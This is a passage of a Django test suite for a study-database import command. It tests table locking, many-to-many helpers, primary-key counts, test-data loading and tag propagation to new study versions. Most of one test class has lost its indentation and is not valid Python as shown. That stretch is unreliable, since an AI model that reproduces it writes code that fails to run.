        cursor.close()
        db.close()  # Testing confirms that closing the db connection removes the locks.
        # Reconnect and confirm that every non-view table is unlocked again.
        db = CMD._get_source_db(which_db='devel')
        cursor = db.cursor(dictionary=True)
        unlocked_tables = self._query_tables(
            cursor, UNLOCKED_TABLES_QUERY, db_name, 'Table', exclude_views=True)
        self.assertListEqual(all_tables, unlocked_tables)

    # This test may be used on an ad hoc basis, but not included in regular testing.
    # Comment out the decorator to run the test.
    @skip("Skip this test because it locks the production topmed_pheno db and will be disruptive to others.")
    def test_locks_all_tables_production(self):
        """Locks all non-view tables in production db."""
        db = CMD._get_source_db(which_db='production')
        db_name = db.database.decode('utf-8')
        CMD._lock_source_db(db)
        cursor = db.cursor(dictionary=True)
        locked_tables = self._query_tables(cursor, LOCKED_TABLES_QUERY, db_name, 'Table')
        all_tables = self._query_tables(
            cursor, ALL_TABLES_QUERY, db_name, 'Tables_in_' + db_name, exclude_views=True)
        self.assertListEqual(all_tables, locked_tables)
        db.close()
class UnlockSourceDbTest(TestCase):
    """Tests of the functions to unlock the source db."""

    def _query_tables(self, cursor, query, db_name, column, exclude_views=False):
        """Run a table-listing query and return the sorted table names."""
        cursor.execute(query.format(db_name=db_name))
        tables = [row[column].decode('utf-8') for row in cursor]
        if exclude_views:
            tables = [el for el in tables if not el.startswith('view_')]
        return sorted(tables)

    def _run_unlock_test(self, which_db):
        """Lock then unlock the given db; check nothing stays locked and every non-view table is unlocked."""
        db = CMD._get_source_db(which_db=which_db)
        db_name = db.database.decode('utf-8')
        CMD._lock_source_db(db)
        CMD._unlock_source_db(db)
        cursor = db.cursor(dictionary=True)
        all_tables = self._query_tables(
            cursor, ALL_TABLES_QUERY, db_name, 'Tables_in_' + db_name, exclude_views=True)
        locked_tables = self._query_tables(cursor, LOCKED_TABLES_QUERY, db_name, 'Table')
        self.assertEqual(len(locked_tables), 0)
        unlocked_tables = self._query_tables(
            cursor, UNLOCKED_TABLES_QUERY, db_name, 'Table', exclude_views=True)
        self.assertListEqual(all_tables, unlocked_tables)
        db.close()

    def test_unlocks_all_tables_devel(self):
        """Unlocks all tables in devel db."""
        self._run_unlock_test('devel')

    # This test may be used on an ad hoc basis, but not included in regular testing.
    # Comment out the decorator to run the test.
    @skip("Skip this test because it locks the production topmed_pheno db and will be disruptive to others.")
    def test_unlocks_all_tables_production(self):
        """Unlocks all tables in production db."""
        self._run_unlock_test('production')
class M2MHelperTest(TestCase):
    """Tests of the helper functions for importing and updating m2m tables."""

    def test_break_m2m_link(self):
        """Removes a child model from its parent M2M field."""
        htsv = factories.HarmonizedTraitSetVersionFactory.create()
        reason = factories.AllowedUpdateReasonFactory.create()
        htsv.update_reasons.add(reason)
        CMD._break_m2m_link(
            models.HarmonizedTraitSetVersion, htsv.pk, models.AllowedUpdateReason, reason.pk, 'update_reasons')
        self.assertNotIn(reason, htsv.update_reasons.all())

    def test_make_m2m_link(self):
        """Adds a child model to its parent M2M field."""
        htsv = factories.HarmonizedTraitSetVersionFactory.create()
        reason = factories.AllowedUpdateReasonFactory.create()
        # Bug fix: the link must NOT be pre-added here. The previous version
        # called htsv.update_reasons.add(reason) before _make_m2m_link, so the
        # assertion passed even if _make_m2m_link did nothing.
        CMD._make_m2m_link(
            models.HarmonizedTraitSetVersion, htsv.pk, models.AllowedUpdateReason, reason.pk, 'update_reasons')
        self.assertIn(reason, htsv.update_reasons.all())

    def test_import_new_m2m_field(self):
        # TODO: implement a test of importing a new m2m field.
        pass

    def test_update_m2m_field(self):
        # TODO: implement a test of updating an existing m2m field.
        pass
class GetCurrentListsTest(TestCase):
    """Tests of _get_current_pks with each possible model."""

    # Number of objects to create in each test.
    n = 32

    def _assert_n_current_pks(self, factory, model):
        """Create a batch of n objects and check that _get_current_pks returns n pks for the model."""
        factory.create_batch(self.n)
        pks = CMD._get_current_pks(model)
        self.assertEqual(len(pks), self.n)

    def test_get_current_global_studies(self):
        """Returns the right number of global_study ids."""
        self._assert_n_current_pks(factories.GlobalStudyFactory, models.GlobalStudy)

    def test_get_current_studies(self):
        """Returns the right number of study ids."""
        self._assert_n_current_pks(factories.StudyFactory, models.Study)

    def test_get_current_source_study_versions(self):
        """Returns the right number of source study version ids."""
        self._assert_n_current_pks(factories.SourceStudyVersionFactory, models.SourceStudyVersion)

    def test_get_current_subcohorts(self):
        """Returns the right number of subcohort ids."""
        self._assert_n_current_pks(factories.SubcohortFactory, models.Subcohort)

    def test_get_current_source_datasets(self):
        """Returns the right number of source dataset ids."""
        # Bug fix: previously created SourceTrait objects and queried the
        # SourceTrait model, so source datasets were never actually tested.
        self._assert_n_current_pks(factories.SourceDatasetFactory, models.SourceDataset)

    def test_get_current_harmonized_trait_sets(self):
        """Returns the right number of harmonized trait sets."""
        self._assert_n_current_pks(factories.HarmonizedTraitSetFactory, models.HarmonizedTraitSet)

    def test_get_current_allowed_update_reasons(self):
        """Returns the right number of allowed update reason ids."""
        self._assert_n_current_pks(factories.AllowedUpdateReasonFactory, models.AllowedUpdateReason)

    def test_get_current_harmonized_trait_set_versions(self):
        """Returns the right number of harmonized trait set versions."""
        self._assert_n_current_pks(factories.HarmonizedTraitSetVersionFactory, models.HarmonizedTraitSetVersion)

    def test_get_current_harmonization_units(self):
        """Returns the right number of harmonization units."""
        self._assert_n_current_pks(factories.HarmonizationUnitFactory, models.HarmonizationUnit)

    def test_get_current_source_traits(self):
        """Returns the right number of source trait ids."""
        # Bug fix: previously created AllowedUpdateReason objects and queried
        # that model, duplicating the allowed-update-reason test above.
        self._assert_n_current_pks(factories.SourceTraitFactory, models.SourceTrait)

    def test_get_current_harmonized_traits(self):
        """Returns the right number of harmonized trait ids."""
        self._assert_n_current_pks(factories.HarmonizedTraitFactory, models.HarmonizedTrait)

    def test_get_current_source_trait_encoded_values(self):
        """Returns the right number of source trait encoded value ids."""
        self._assert_n_current_pks(factories.SourceTraitEncodedValueFactory, models.SourceTraitEncodedValue)

    def test_get_current_harmonized_trait_encoded_values(self):
        """Returns the right number of harmonized trait encoded value ids."""
        self._assert_n_current_pks(factories.HarmonizedTraitEncodedValueFactory, models.HarmonizedTraitEncodedValue)
# Tests that require test data.
class SourceDbTestDataTest(OpenCloseDBMixin, TestCase):
    """Tests that the source db test data files load with the expected contents."""

    def _reopen_db(self):
        """Close the current cursor and connection and open fresh ones."""
        self.cursor.close()
        self.source_db.close()
        self.source_db = get_devel_db()
        self.cursor = self.source_db.cursor(buffered=True, dictionary=True)

    def _load_and_count(self, sql_file):
        """Load one test data file and return (study_count, source_study_version_count)."""
        load_test_source_db_data(sql_file)
        self.cursor.execute('SELECT COUNT(*) AS study_count FROM study')
        study_count = self.cursor.fetchone()['study_count']
        self.cursor.execute('SELECT COUNT(*) AS ssv_count FROM source_study_version')
        ssv_count = self.cursor.fetchone()['ssv_count']
        return study_count, ssv_count

    def test_load_all_source_db_test_data(self):
        """Load all test data sets and check study and version counts for each."""
        clean_devel_db()
        study_count, ssv_count = self._load_and_count('base.sql')
        self.assertEqual(study_count, 2)
        self.assertEqual(ssv_count, 3)
        # Reconnect between loads so each file is read on a fresh connection.
        self._reopen_db()
        study_count, ssv_count = self._load_and_count('new_study.sql')
        self.assertEqual(study_count, 3)
        self.assertEqual(ssv_count, 4)
        self._reopen_db()
        study_count, ssv_count = self._load_and_count('new_study_version.sql')
        self.assertEqual(study_count, 3)
        self.assertEqual(ssv_count, 5)
class SetDatasetNamesTest(BaseTestDataTestCase):
    """Tests of the _set_dataset_names method."""
    @classmethod
    def setUpClass(cls):
        """Create a user."""
        super().setUpClass()
        cls.user = UserFactory.create()
    def test_dataset_name_after_import(self):
        """The dataset_name field is a valid-ish string after running an import."""
        # Run a full import against the devel db; dataset names are set during import.
        management.call_command('import_db', '--devel_db', '--no_backup',
                                '--taggedtrait_creator={}'.format(self.user.email))
        source_dataset_names = models.SourceDataset.objects.all().values_list('dataset_name', flat=True)
        # None of the dataset_names are empty strings anymore.
        self.assertNotIn('', source_dataset_names)
        # None of the dataset names have a phs.v.pht.v string in them.
        self.assertFalse(any([DBGAP_RE.search(name) for name in source_dataset_names]))
        # None of the dataset names have any directory path in them.
        self.assertFalse(any(['/' in name for name in source_dataset_names]))
    def test_dbgap_filename_after_import(self):
        """The dbgap_filename field is a valid-ish string after running an import."""
        management.call_command('import_db', '--devel_db', '--no_backup',
                                '--taggedtrait_creator={}'.format(self.user.email))
        source_dataset_files = models.SourceDataset.objects.all().values_list('dbgap_filename', flat=True)
        # None of the file names are empty strings anymore. (Comment corrected:
        # this test checks dbgap_filename, not dataset_name.)
        self.assertNotIn('', source_dataset_files)
        # All of the file names have a phs.v.pht.v string in them.
        self.assertTrue(all([DBGAP_RE.search(name) for name in source_dataset_files]))
        # None of the file names have any directory path in them.
        self.assertFalse(any(['/' in name for name in source_dataset_files]))
class ApplyTagsToNewSourceStudyVersionsTest(BaseTestDataTestCase):
"""Tests of the _apply_tags_to_new_sourcestudyversions() helper method."""
    @classmethod
    def setUpClass(cls):
        """Load the base test data and run the import_db management command."""
        # Run the BaseTestDataTestCase setUpClass method.
        super().setUpClass()
        # User recorded as the creator of tagged traits made in these tests.
        cls.user = UserFactory.create()
        # Import the base test data.
        management.call_command('import_db', '--no_backup', '--devel_db',
                                '--taggedtrait_creator={}'.format(cls.user.email))
def test_update_one_taggedtrait_with_one_new_sourcestudyversion(self):
"""Updates a single tagged trait with a new version."""
# Make a taggedtrait from existing base test data.
trait1 = models.SourceTrait.objects.current().order_by('?').first()
ssv1 = trait1.source_dataset.source_study_version
dataset1 = trait1.source_dataset
tag = TagFactory.create()
# tag = TagFactory.create()
taggedtrait1 = TaggedTraitFactory.create(creator=self.user, trait=trait1, tag=tag)
DCCReview.objects.create(tagged_trait=taggedtrait1, creator=self.user, status=DCCReview.STATUS_CONFIRMED)
self.assertEqual(TaggedTrait.objects.count(), 1)
# Make a new version of an existing ssv, dataset, and source trait.
ssv2 = copy(ssv1)
ssv2.i_version = ssv1.i_version + 1
ssv2.pk = max(models.SourceStudyVersion.objects.values_list('pk', flat=True)) + 1
ssv2.i_date_added = ssv1.i_date_added + timedelta(days=7)
ssv2.i_date_changed = ssv1.i_date_changed + timedelta(days=7)
ssv2.created = ssv1.created + timedelta(days=7)
ssv2.modified = ssv1.modified + timedelta(days=7)
ssv2.save()
dataset2 = copy(dataset1)
dataset2.pk = max(models.SourceDataset.objects.values_list('pk', flat=True)) + 1
dataset2.source_study_version = ssv2
dataset2.i_date_added = dataset1.i_date_added + timedelta(days=7)
dataset2.i_date_changed = dataset1.i_date_changed + timedelta(days=7)
dataset2.created = dataset1.created + timedelta(days=7)
dataset2.modified = dataset1.modified + timedelta(days=7)
dataset2.save()
trait2 = copy(trait1)
trait2.pk = max(models.SourceTrait.objects.values_list('pk', flat=True)) + 1
trait2.source_dataset = dataset2
trait2.i_date_added = trait1.i_date_added + timedelta(days=7)
trait2.i_date_changed = trait1.i_date_changed + timedelta(days=7)
trait2.created = trait1.created + timedelta(days=7)
trait2.modified = trait1.modified + timedelta(days=7)
trait2.save()
# Run _apply_tags_to_new_sourcestudyversions
user2 = UserFactory.create()
CMD._apply_tags_to_new_sourcestudyversions(sourcestudyversion_pks=[ssv2.pk], creator=user2)
self.assertEqual(TaggedTrait.objects.count(), 2)
# Look for the new taggedtrait version
taggedtrait2 = TaggedTrait.objects.get(trait=trait2)
self.assertEqual(taggedtrait2.previous_tagged_trait, taggedtrait1)
self.assertEqual(taggedtrait2.creator, user2)
def test_update_two_taggedtraits_with_one_new_sourcestudyversion(self):
"""Updates two tagged traits with a new version in the same study."""
# Make a taggedtrait from existing base test data.
trait1 = models.SourceTrait.objects.current().order_by('?').first()
ssv1 = trait1.source_dataset.source_study_version
another_trait1 = models.SourceTrait.objects.filter(
source_dataset__source_study_version=ssv1).exclude(
pk=trait1.pk
).order_by('?').first()
dataset1 = trait1.source_dataset
another_dataset1 = another_trait1.source_dataset
tag = TagFactory.create()
another_tag = TagFactory.create()
# tag = TagFactory.create()
taggedtrait1 = TaggedTraitFactory.create(creator=self.user, trait=trait1, tag=tag)
DCCReview.objects.create(tagged_trait=taggedtrait1, creator=self.user, status=DCCReview.STATUS_CONFIRMED)
another_taggedtrait1 = TaggedTraitFactory.create(creator=self.user, trait=another_trait1, tag=another_tag)
DCCReview.objects.create(
tagged_trait=another_taggedtrait1, creator=self.user, status=DCCReview.STATUS_CONFIRMED)
self.assertEqual(TaggedTrait.objects.count(), 2)
# Make a new version of an existing ssv, dataset, and source trait.
ssv2 = copy(ssv1)
ssv2.i_version = ssv1.i_version + 1
ssv2.pk = max(models.SourceStudyVersion.objects.values_list('pk', flat=True)) + 1
ssv2.i_date_added = ssv1.i_date_added + timedelta(days=7)
ssv2.i_date_changed = ssv1.i_date_changed + timedelta(days=7)
ssv2.created = ssv1.created + timedelta(days=7)
ssv2.modified = ssv1.modified + timedelta(days=7)
ssv2.save()
dataset2 = copy(dataset1)
dataset2.pk = max(models.SourceDataset.objects.values_list('pk', flat=True)) + 1
dataset2.source_study_version = ssv2
dataset2.i_date_added = dataset1.i_date_added + timedelta(days=7)
dataset2.i_date_changed = dataset1.i_date_changed + timedelta(days=7)
dataset2.created = dataset1.created + timedelta(days=7)
dataset2.modified = dataset1.modified + timedelta(days=7)
dataset2.save()
another_dataset2 = copy(another_dataset1)
another_dataset2.pk = max(models.SourceDataset.objects.values_list('pk', flat=True)) + 1
another_dataset2.source_study_version = ssv2
another_dataset2.i_date_added = another_dataset1.i_date_added + timedelta(days=7)
another_dataset2.i_date_changed = another_dataset1.i_date_changed + timedelta(days=7)
another_dataset2.created = another_dataset1.created + timedelta(days=7)
another_dataset2.modified = another_dataset1.modified + timedelta(days=7)
another_dataset2.save()
trait2 = copy(trait1)
trait2.pk = max(models.SourceTrait.objects.values_list('pk', flat=True)) + 1
trait2.source_dataset = dataset2
trait2.i_date_added = trait1.i_date_added + timedelta(days=7)
trait2.i_date_changed = trait1.i_date_changed + timedelta(days=7)
trait2.created = trait1.created + timedelta(days=7)
trait2.modified = trait1.modified + timedelta(days=7)
trait2.save()
another_trait2 = copy(another_trait1)
another_trait2.pk = max(models.SourceTrait.objects.values_list('pk', flat=True)) + 1
another_trait2.source_dataset = dataset2
another_trait2.i_date_added = another_trait1.i_date_added + timedelta(days=7)
another_trait2.i_date_changed = another_trait1.i_date_changed + timedelta(days=7)
another_trait2.created = another_trait1.created + timedelta(days=7)
another_trait2.modified = another_trait1.modified + timedelta(days=7)
another_trait2.save()
# Run _apply_tags_to_new_sourcestudyversions
user2 = UserFactory.create()
CMD._apply_tags_to_new_sourcestudyversions(sourcestudyversion_pks=[ssv2.pk], creator=user2)
self.assertEqual(TaggedTrait.objects.count(), 4)
# Look for the new taggedtrait version
taggedtrait2 = TaggedTrait.objects.get(trait=trait2)
self.assertEqual(taggedtrait2.previous_tagged_trait, taggedtrait1)
self.assertEqual(taggedtrait2.creator, user2)
another_taggedtrait2 = TaggedTrait.objects.get(trait=another_trait2)
self.assertEqual(another_taggedtrait2.previous_tagged_trait, another_taggedtrait1)
self.assertEqual(another_taggedtrait2.creator, user2)
def test_update_two_taggedtraits_with_two_new_sourcestudyversions(self):
"""Updates two tagged traits from two new versions of same study."""
# Make a taggedtrait from existing base test data.
trait1 = models.SourceTrait.objects.current().order_by('?').first()
ssv1 = trait1.source_dataset.source_study_version
dataset1 = trait1.source_dataset
tag = TagFactory.create()
# tag = TagFactory.create()
taggedtrait1 = TaggedTraitFactory.create(creator=self.user, trait=trait1, tag=tag)
DCCReview.objects.create(tagged_trait=taggedtrait1, creator=self.user, status=DCCReview.STATUS_CONFIRMED)
self.assertEqual(TaggedTrait.objects.count(), 1)
# Make two new source study versions.
ssv2 = copy(ssv1)
ssv2.i_version = ssv1.i_version + 1
ssv2.pk = max(models.SourceStudyVersion.objects.values_list('pk', flat=True)) + 1
ssv2.i_date_added = ssv1.i_date_added + timedelta(days=7)
ssv2.i_date_changed = ssv1.i_date_changed + timedelta(days=7)
ssv2.created = ssv1.created + timedelta(days=7)
ssv2.modified = ssv1.modified + timedelta(days=7)
ssv2.save()
ssv3 = copy(ssv2)
ssv3.i_version = ssv2.i_version + 1
ssv3.pk = max(models.SourceStudyVersion.objects.values_list('pk', flat=True)) + 1
ssv3.i_date_added = ssv2.i_date_added + timedelta(days=7)
ssv3.i_date_changed = ssv2.i_date_changed + timedelta(days=7)
ssv3.created = ssv2.created + timedelta(days=7)
ssv3.modified = ssv2.modified + timedelta(days=7)
ssv3.save()
# Make two new datasets from the two new study versions.
dataset2 = copy(dataset1)
dataset2.pk = max(models.SourceDataset.objects.values_list('pk', flat=True)) + 1
dataset2.source_study_version = ssv2
dataset2.i_date_added = dataset1.i_date_added + timedelta(days=7)
dataset2.i_date_changed = dataset1.i_date_changed + timedelta(days=7)
dataset2.created = dataset1.created + timedelta(days=7)
dataset2.modified = dataset1.modified + timedelta(days=7)
dataset2.save()
dataset3 = copy(dataset2)
dataset3.pk = max(models.SourceDataset.objects.values_list('pk', flat=True)) + 1
dataset3.source_study_version = ssv3
dataset3.i_date_added = dataset2.i_date_added + timedelta(days=7)
dataset3.i_date_changed = dataset2.i_date_changed + timedelta(days=7)
dataset3.created = dataset2.created + timedelta(days=7)
dataset3.modified = dataset2.modified + timedelta(days=7)
dataset3.save()
# Make two new traits from the two new datasets.
trait2 = copy(trait1)
trait2.pk = max(models.SourceTrait.objects.values_list('pk', flat=True)) + 1
trait2.source_dataset = dataset2
trait2.i_date_added = trait1.i_date_added + timedelta(days=7)
trait2.i_date_changed = trait1.i_date_changed + timedelta(days=7)
trait2.created = trait1.created + timedelta(days=7)
trait2.modified = trait1.modified + timedelta(days=7)
trait2.save()
trait3 = copy(trait2)
trait3.pk = max(models.SourceTrait.objects.values_list('pk', flat=True)) + 1
trait3.source_dataset = dataset3
trait3.i_date_added = trait2.i_date_added + timedelta(days=7)
trait3.i_date_changed = trait2.i_date_changed + timedelta(days=7)
trait3.created = trait2.created + timedelta(days=7)
trait3.modified = trait2.modified + timedelta(days=7)
trait3.save()
# Run _apply_tags_to_new_sourcestudyversions
user2 = UserFactory.create()
CMD._apply_tags_to_new_sourcestudyversions(sourcestudyversion_pks=[ssv2.pk, ssv3.pk], creator=user2)
self.assertEqual(TaggedTrait.objects.count(), 3)
# Look for the new taggedtrait versions.
taggedtrait2 = TaggedTrait.objects.get(trait=trait2)
self.assertEqual(taggedtrait2.previous_tagged_trait, taggedtrait1)
self.assertEqual(taggedtrait2.creator, user2)
taggedtrait3 = TaggedTrait.objects.get(trait=trait3)
self.assertEqual(taggedtrait3.previous_tagged_trait, taggedtrait2)
self.assertEqual(taggedtrait3.creator, user2)
def test_update_two_taggedtraits_with_two_new_sourcestudyversions_reversed(self):
"""Updates two tagged traits from two new versions of same study in reverse order."""
# Make a taggedtrait from existing base test data.
trait1 = models.SourceTrait.objects.current().order_by('?').first()
ssv1 = trait1.source_dataset.source_study_version
dataset1 = trait1.source_dataset
tag = TagFactory.create()
# tag = TagFactory.create()
taggedtrait1 = TaggedTraitFactory.create(creator=self.user, trait=trait1, tag=tag)
DCCReview.objects.create(tagged_trait=taggedtrait1, creator=self.user, status=DCCReview.STATUS_CONFIRMED)
self.assertEqual(TaggedTrait.objects.count(), 1)
# Make two new source study versions.
ssv2 = copy(ssv1)
ssv2.i_version = ssv1.i_version + 1
ssv2.pk = max(models.SourceStudyVersion.objects.values_list('pk', flat=True)) + 1
ssv2.i_date_added = ssv1.i_date_added + timedelta(days=7)
ssv2.i_date_changed = ssv1.i_date_changed + timedelta(days=7)
ssv2.created = ssv1.created + timedelta(days=7)
ssv2.modified = ssv1.modified + timedelta(days=7)
ssv2.save()
ssv3 = copy(ssv2)
ssv3.i_version = ssv2.i_version + 1
ssv3.pk = max(models.SourceStudyVersion.objects.values_list('pk', flat=True)) + 1
ssv3.i_date_added = ssv2.i_date_added + timedelta(days=7)
ssv3.i_date_changed = ssv2.i_date_changed + timedelta(days=7)
ssv3.created = ssv2.created + timedelta(days=7)
ssv3.modified = ssv2.modified + timedelta(days=7)
ssv3.save()
# Make two new datasets from the two new study versions.
dataset2 = copy(dataset1)
dataset2.pk = max(models.SourceDataset.objects.values_list('pk', flat=True)) + 1
dataset2.source_study_version = ssv2
dataset2.i_date_added = dataset1.i_date_added + timedelta(days=7)
dataset2.i_date_changed = dataset1.i_date_changed + timedelta(days=7)
dataset2.created = dataset1.created + timedelta(days=7)
dataset2.modified = dataset1.modified + timedelta(days=7)
dataset2.save()
dataset3 = copy(dataset2)
dataset3.pk = max(models.SourceDataset.objects.values_list('pk', flat=True)) + 1
dataset3.source_study_version = ssv3
dataset3.i_date_added = dataset2.i_date_added + timedelta(days=7)
dataset3.i_date_changed = dataset2.i_date_changed + timedelta(days=7)
dataset3.created = dataset2.created + timedelta(days=7)
dataset3.modified = dataset2.modified + timedelta(days=7)
dataset3.save()
# Make two new traits from the two new datasets.
trait2 = copy(trait1)
trait2.pk = max(models.SourceTrait.objects.values_list('pk', flat=True)) + 1
trait2.source_dataset = dataset2
trait2.i_date_added = trait1.i_date_added + timedelta(days=7)
trait2.i_date_changed = trait1.i_date_changed + timedelta(days=7)
trait2.created = trait1.created + timedelta(days=7)
trait2.modified = trait1.modified + timedelta(days=7)
trait2.save()
trait3 = copy(trait2)
trait3.pk = max(models.SourceTrait.objects.values_list('pk', flat=True)) + 1
trait3.source_dataset = dataset3
trait3.i_date_added = trait2.i_date_added + timedelta(days=7)
trait3.i_date_changed = trait2.i_date_changed + timedelta(days=7)
trait3.created = trait2.created + timedelta(days=7)
trait3.modified = trait2.modified + timedelta(days=7)
trait3.save()
# Run _apply_tags_to_new_sourcestudyversions
user2 = UserFactory.create()
# Give the ssv pks in the wrong order.
CMD._apply_tags_to_new_sourcestudyversions(sourcestudyversion_pks=[ssv3.pk, ssv2.pk], creator=user2)
self.assertEqual(TaggedTrait.objects.count(), 3)
# Look for the new taggedtrait versions.
taggedtrait2 = TaggedTrait.objects.get(trait=trait2)
self.assertEqual(taggedtrait2.previous_tagged_trait, taggedtrait1)
self.assertEqual(taggedtrait2.creator, user2)
taggedtrait3 = TaggedTrait.objects.get(trait=trait3)
self.assertEqual(taggedtrait3.previous_tagged_trait, taggedtrait2)
self.assertEqual(taggedtrait3.creator, user2)
def test_update_two_taggedtraits_with_new_versions_from_two_studies(self):
"""_apply_tags_to_new_sourcestudyversions updates two tagged traits from new versions of different studies."""
tag = TagFactory.create()
# Make a taggedtrait from existing base test data for one study.
study1_trait1 = models.SourceTrait.objects.current().order_by('?').first()
study1_ssv1 = study1_trait1.source_dataset.source_study_version
study1_dataset1 = study1_trait1.source_dataset
study1_taggedtrait1 = TaggedTraitFactory.create(creator=self.user, trait=study1_trait1, tag=tag)
DCCReview.objects.create(
tagged_trait=study1_taggedtrait1, creator=self.user, status=DCCReview.STATUS_CONFIRMED)
# Make a taggedtrait from existing base test data for a second study.
study2_trait1 = models.SourceTrait.objects.current().exclude(
source_dataset__source_study_version__study=study1_trait1.source_dataset.source_study_version.study
).order_by('?').first()
study2_ssv1 = study2_trait1.source_dataset.source_study_version
study2_dataset1 = study2_trait1.source_dataset
study2_taggedtrait1 = TaggedTraitFactory.create(creator=self.user, trait=study2_trait1, tag=tag)
DCCReview.objects.create(
tagged_trait=study2_taggedtrait1, creator=self.user, status=DCCReview.STATUS_CONFIRMED)
self.assertEqual(TaggedTrait.objects.count(), 2)
# Make two new source study versions.
study1_ssv2 = copy(study1_ssv1)
study1_ssv2.i_version = study1_ssv1.i_version + 1
study1_ssv2.pk = max(models.SourceStudyVersion.objects.values_list('pk', flat=True)) + 1
study1_ssv2.i_date_added = study1_ssv1.i_date_added + timedelta(days=7)
study1_ssv2.i_date_changed = study1_ssv1.i_date_changed + timedelta(days=7)
study1_ssv2.created = study1_ssv1.created + timedelta(days=7)
study1_ssv2.modified = study1_ssv1.modified + timedelta(days=7)
study1_ssv2.save()
study2_ssv2 = copy(study2_ssv1)
study2_ssv2.i_version = study2_ssv1.i_version + 1
study2_ssv2.pk = max(models.SourceStudyVersion.objects.values_list('pk', flat=True)) + 1
study2_ssv2.i_date_added = study2_ssv1.i_date_added + timedelta(days=7)
study2_ssv2.i_date_changed = study2_ssv1.i_date_changed + timedelta(days=7)
study2_ssv2.created = study2_ssv1.created + timedelta(days=7)
study2_ssv2.modified = study2_ssv1.modified + timedelta(days=7)
study2_ssv2.save()
# Make two new datasets from the two new study versions.
study1_dataset2 = copy(study1_dataset1)
study1_dataset2.pk = max(models.SourceDataset.objects.values_list('pk', flat=True)) + 1
study1_dataset2.source_study_version = study1_ssv2
study1_dataset2.i_date_added = study1_dataset1.i_date_added + timedelta(days=7)
study1_dataset2.i_date_changed = study1_dataset1.i_date_changed + timedelta(days=7)
study1_dataset2.created = study1_dataset1.created + timedelta(days=7)
study1_dataset2.modified = study1_dataset1.modified + timedelta(days=7)
study1_dataset2.save()
study2_dataset2 = copy(study2_dataset1)
study2_dataset2.pk = max(models.SourceDataset.objects.values_list('pk', flat=True)) + 1
study2_dataset2.source_study_version = study2_ssv2
study2_dataset2.i_date_added = study2_dataset1.i_date_added + timedelta(days=7)
study2_dataset2.i_date_changed = study2_dataset1.i_date_changed + timedelta(days=7)
study2_dataset2.created = study2_dataset1.created + timedelta(days=7)
study2_dataset2.modified = study2_dataset1.modified + timedelta(days=7)
study2_dataset2.save()
# Make two new traits from the two new datasets.
study1_trait2 = copy(study1_trait1)
study1_trait2.pk = max(models.SourceTrait.objects.values_list('pk', flat=True)) + 1
study1_trait2.source_dataset = study1_dataset2
study1_trait2.i_date_added = study1_trait1.i_date_added + timedelta(days=7)
study1_trait2.i_date_changed = study1_trait1.i_date_changed + timedelta(days=7)
study1_trait2.created = study1_trait1.created + timedelta(days=7)
study1_trait2.modified = study1_trait1.modified + timedelta(days=7)
study1_trait2.save()
study2_trait2 = copy(study2_trait1)
study2_trait2.pk = max(models.SourceTrait.objects.values_list('pk', flat=True)) + 1
study2_trait2.source_dataset = study2_dataset2
study2_trait2.i_date_added = study2_trait1.i_date_added + timedelta(days=7)
study2_trait2.i_date_changed = study2_trait1.i_date_changed + timedelta(days=7)
study2_trait2.created = study2_trait1.created + timedelta(days=7)
study2_trait2.modified = study2_trait1.modified + timedelta(days=7)
study2_trait2.save()
# Run _apply_tags_to_new_sourcestudyversions
user2 = UserFactory.create()
CMD._apply_tags_to_new_sourcestudyversions(
sourcestudyversion_pks=[study1_ssv2.pk, study2_ssv2.pk], creator=user2)
self.assertEqual(TaggedTrait.objects.count(), 4)
# Look for the new taggedtrait versions.
study1_taggedtrait2 = TaggedTrait.objects.get(trait=study1_trait2)
self.assertEqual(study1_taggedtrait2.previous_tagged_trait, study1_taggedtrait1)
self.assertEqual(study1_taggedtrait2.creator, user2)
study2_taggedtrait2 = TaggedTrait.objects.get(trait=study2_trait2)
self.assertEqual(study2_taggedtrait2.previous_tagged_trait, study2_taggedtrait1)
self.assertEqual(study2_taggedtrait2.creator, user2)
    def test_no_updates_with_trait_missing_in_new_version(self):
        """Does not create any new tagged traits when the trait is not updated."""
        # Make a taggedtrait from existing base test data.
        trait1 = models.SourceTrait.objects.current().order_by('?').first()
        ssv1 = trait1.source_dataset.source_study_version
        dataset1 = trait1.source_dataset
        tag = TagFactory.create()
        taggedtrait1 = TaggedTraitFactory.create(creator=self.user, trait=trait1, tag=tag)
        DCCReview.objects.create(tagged_trait=taggedtrait1, creator=self.user, status=DCCReview.STATUS_CONFIRMED)
        self.assertEqual(TaggedTrait.objects.count(), 1)
        # Make a new version of the existing ssv and dataset only; the trait itself gets no new version.
        ssv2 = copy(ssv1)
        ssv2.i_version = ssv1.i_version + 1
        ssv2.pk = max(models.SourceStudyVersion.objects.values_list('pk', flat=True)) + 1
        # Shift all date/audit fields a week later so the copy looks like a later import.
        ssv2.i_date_added = ssv1.i_date_added + timedelta(days=7)
        ssv2.i_date_changed = ssv1.i_date_changed + timedelta(days=7)
        ssv2.created = ssv1.created + timedelta(days=7)
        ssv2.modified = ssv1.modified + timedelta(days=7)
        ssv2.save()
        dataset2 = copy(dataset1)
        dataset2.pk = max(models.SourceDataset.objects.values_list('pk', flat=True)) + 1
        dataset2.source_study_version = ssv2
        dataset2.i_date_added = dataset1.i_date_added + timedelta(days=7)
        dataset2.i_date_changed = dataset1.i_date_changed + timedelta(days=7)
        dataset2.created = dataset1.created + timedelta(days=7)
        dataset2.modified = dataset1.modified + timedelta(days=7)
        dataset2.save()
        # Do not create a new version of the trait in this new study version.
        # Run _apply_tags_to_new_sourcestudyversions
        user2 = UserFactory.create()
        CMD._apply_tags_to_new_sourcestudyversions(sourcestudyversion_pks=[ssv2.pk], creator=user2)
        self.assertEqual(TaggedTrait.objects.count(), 1)
        # No new taggedtrait version should have been created by user2.
        self.assertEqual(TaggedTrait.objects.filter(creator=user2).count(), 0)
class MakeArgsTest(BaseTestDataTestCase):
    """Tests of the _make_[model]_args functions.

    Each test fetches one row from the corresponding source-db table, converts it
    with CMD._fix_row, builds model kwargs with the matching _make_*_args function,
    and checks that a model instance can be created and saved from those kwargs.
    Foreign-key targets are created with factories first where needed.
    """
    def test_make_global_study_args_one_row_make_global_study_obj(self):
        """A GlobalStudy can be created from the args made from a row of test data."""
        global_study_query = 'SELECT * FROM global_study;'
        self.cursor.execute(global_study_query)
        row_dict = self.cursor.fetchone()
        # Map each column name to its db type code so _fix_row can convert values properly.
        field_types = {el[0]: el[1] for el in self.cursor.description}
        global_study_args = CMD._make_global_study_args(CMD._fix_row(row_dict, field_types))
        global_study = models.GlobalStudy(**global_study_args)
        global_study.save()
        self.assertIsInstance(global_study, models.GlobalStudy)
    def test_make_study_args_one_row_make_study_obj(self):
